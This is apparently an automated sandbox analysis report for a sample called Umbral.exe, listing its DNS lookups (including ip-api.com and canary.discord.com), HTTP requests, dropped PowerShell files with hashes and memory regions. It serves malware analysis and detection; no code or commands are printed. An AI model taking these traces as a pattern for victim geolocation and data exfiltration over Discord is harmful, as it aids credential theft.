        959.3kB
        702
        699

        HTTP Request

        GET https://tse1.mm.bing.net/th?id=OADD2.10239351692210_1AKNUXTAY2T0XUMCR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

        HTTP Response

        200

        HTTP Request

        GET https://tse1.mm.bing.net/th?id=OADD2.10239351692215_1UJ4FAL91XLA7HB15&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

        HTTP Response

        200
      • 8.8.8.8:53
        gstatic.com
        dns
        Umbral.exe
        57 B
        73 B
        1
        1

        DNS Request

        gstatic.com

        DNS Response

        216.58.201.99

      • 8.8.8.8:53
        ip-api.com
        dns
        Umbral.exe
        56 B
        72 B
        1
        1

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

      • 8.8.8.8:53
        99.201.58.216.in-addr.arpa
        dns
        72 B
        169 B
        1
        1

        DNS Request

        99.201.58.216.in-addr.arpa

      • 8.8.8.8:53
        133.211.185.52.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        133.211.185.52.in-addr.arpa

      • 8.8.8.8:53
        172.210.232.199.in-addr.arpa
        dns
        74 B
        128 B
        1
        1

        DNS Request

        172.210.232.199.in-addr.arpa

      • 8.8.8.8:53
        1.112.95.208.in-addr.arpa
        dns
        71 B
        95 B
        1
        1

        DNS Request

        1.112.95.208.in-addr.arpa

      • 8.8.8.8:53
        138.32.126.40.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        138.32.126.40.in-addr.arpa

      • 8.8.8.8:53
        196.249.167.52.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        196.249.167.52.in-addr.arpa

      • 8.8.8.8:53
        canary.discord.com
        dns
        Umbral.exe
        64 B
        144 B
        1
        1

        DNS Request

        canary.discord.com

        DNS Response

        162.159.128.233
        162.159.136.232
        162.159.135.232
        162.159.138.232
        162.159.137.232

      • 8.8.8.8:53
        g.bing.com
        dns
        56 B
        151 B
        1
        1

        DNS Request

        g.bing.com

        DNS Response

        204.79.197.237
        13.107.21.237

      • 8.8.8.8:53
        233.128.159.162.in-addr.arpa
        dns
        74 B
        136 B
        1
        1

        DNS Request

        233.128.159.162.in-addr.arpa

      • 8.8.8.8:53
        237.197.79.204.in-addr.arpa
        dns
        73 B
        143 B
        1
        1

        DNS Request

        237.197.79.204.in-addr.arpa

      • 8.8.8.8:53
        155.61.62.23.in-addr.arpa
        dns
        71 B
        135 B
        1
        1

        DNS Request

        155.61.62.23.in-addr.arpa

      • 8.8.8.8:53
        149.220.183.52.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        149.220.183.52.in-addr.arpa

      • 8.8.8.8:53
        103.169.127.40.in-addr.arpa
        dns
        73 B
        147 B
        1
        1

        DNS Request

        103.169.127.40.in-addr.arpa

      • 8.8.8.8:53
        56.126.166.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        56.126.166.20.in-addr.arpa

      • 8.8.8.8:53
        139.53.16.96.in-addr.arpa
        dns
        71 B
        135 B
        1
        1

        DNS Request

        139.53.16.96.in-addr.arpa

      • 8.8.8.8:53
        79.190.18.2.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        79.190.18.2.in-addr.arpa

      • 8.8.8.8:53
        55.36.223.20.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        55.36.223.20.in-addr.arpa

      • 8.8.8.8:53
        51.15.97.104.in-addr.arpa
        dns
        71 B
        135 B
        1
        1

        DNS Request

        51.15.97.104.in-addr.arpa

      • 8.8.8.8:53
        29.243.111.52.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        29.243.111.52.in-addr.arpa

      • 8.8.8.8:53
        tse1.mm.bing.net
        dns
        62 B
        173 B
        1
        1

        DNS Request

        tse1.mm.bing.net

        DNS Response

        204.79.197.200
        13.107.21.200

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        6d42b6da621e8df5674e26b799c8e2aa

        SHA1

        ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

        SHA256

        5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

        SHA512

        53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        2b566ffd6de9e256d318da539ea226be

        SHA1

        5687791670b1391754d5c4d80e520cf7e3edd3db

        SHA256

        c292acf9fdd61c1cc21b4e3139b32b20b878b7094e7b30fc9d255f0bf60059ef

        SHA512

        3d76037af1080d099ef0037d1e49a40c883e452bb2e4d8f528d5f824142189ea92faa03488cadee2b30ec9b3a8283935a8b3c26e10578dd1ebbca9eda3a5ea7c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        276798eeb29a49dc6e199768bc9c2e71

        SHA1

        5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

        SHA256

        cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

        SHA512

        0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        ec68f430dd646907595c25a337c6f032

        SHA1

        7fc35f368450557543feac46f3ec34cd68581811

        SHA256

        43b31b43ebf535cffbf983420cfc26f0cd0bb8e88b0add85383b458243a36ab5

        SHA512

        1ab54dd427341ca14d580736d2ec06c91abf1e1b45b5ca982f05c43c5a86a7e64684f3c3eb00f31db89f244027b450a0f5a05c9f954032c58a72f138aab05ed3

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2xllruam.clt.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/3492-68-0x0000027C5D7C0000-0x0000027C5D7CA000-memory.dmp

        Filesize

        40KB

      • memory/3492-35-0x0000027C5D790000-0x0000027C5D7AE000-memory.dmp

        Filesize

        120KB

      • memory/3492-87-0x00007FF97DB40000-0x00007FF97E601000-memory.dmp

        Filesize

        10.8MB

      • memory/3492-69-0x0000027C5D9E0000-0x0000027C5D9F2000-memory.dmp

        Filesize

        72KB

      • memory/3492-2-0x00007FF97DB40000-0x00007FF97E601000-memory.dmp

        Filesize

        10.8MB

      • memory/3492-33-0x0000027C5D810000-0x0000027C5D886000-memory.dmp

        Filesize

        472KB

      • memory/3492-34-0x0000027C5D890000-0x0000027C5D8E0000-memory.dmp

        Filesize

        320KB

      • memory/3492-0-0x0000027C430D0000-0x0000027C43110000-memory.dmp

        Filesize

        256KB

      • memory/3492-1-0x00007FF97DB43000-0x00007FF97DB45000-memory.dmp

        Filesize

        8KB

      • memory/4400-10-0x0000017A95C40000-0x0000017A95C62000-memory.dmp

        Filesize

        136KB

      • memory/4400-4-0x00007FF97DB40000-0x00007FF97E601000-memory.dmp

        Filesize

        10.8MB

      • memory/4400-3-0x00007FF97DB40000-0x00007FF97E601000-memory.dmp

        Filesize

        10.8MB

      • memory/4400-15-0x00007FF97DB40000-0x00007FF97E601000-memory.dmp

        Filesize

        10.8MB

      • memory/4400-18-0x00007FF97DB40000-0x00007FF97E601000-memory.dmp

        Filesize

        10.8MB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.